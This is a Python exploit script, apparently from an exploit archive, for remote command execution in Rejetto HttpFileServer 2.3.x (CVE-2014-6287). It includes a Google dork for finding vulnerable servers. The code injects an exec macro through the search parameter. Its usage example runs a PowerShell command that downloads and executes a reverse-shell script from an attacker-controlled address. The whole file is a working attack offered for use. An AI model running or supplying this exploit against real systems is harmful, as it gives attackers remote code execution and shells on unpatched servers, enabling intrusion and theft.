29 lines
No EOL
1,012 B
Python
Executable file
29 lines
No EOL
1,012 B
Python
Executable file
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
|
|
# Google Dork: intext:"httpfileserver 2.3"
|
|
# Date: 28-11-2020
|
|
# Remote: Yes
|
|
# Exploit Author: Óscar Andreu
|
|
# Vendor Homepage: http://rejetto.com/
|
|
# Software Link: http://sourceforge.net/projects/hfs/
|
|
# Version: 2.3.x
|
|
# Tested on: Windows Server 2008 , Windows 8, Windows 7
|
|
# CVE : CVE-2014-6287
|
|
|
|
#!/usr/bin/python3
|
|
|
|
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
|
|
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
|
|
|
|
import urllib3
|
|
import sys
|
|
import urllib.parse
|
|
|
|
try:
|
|
http = urllib3.PoolManager()
|
|
url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
|
|
print(url)
|
|
response = http.request('GET', url)
|
|
|
|
except Exception as ex:
|
|
print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
|
|
print(ex) |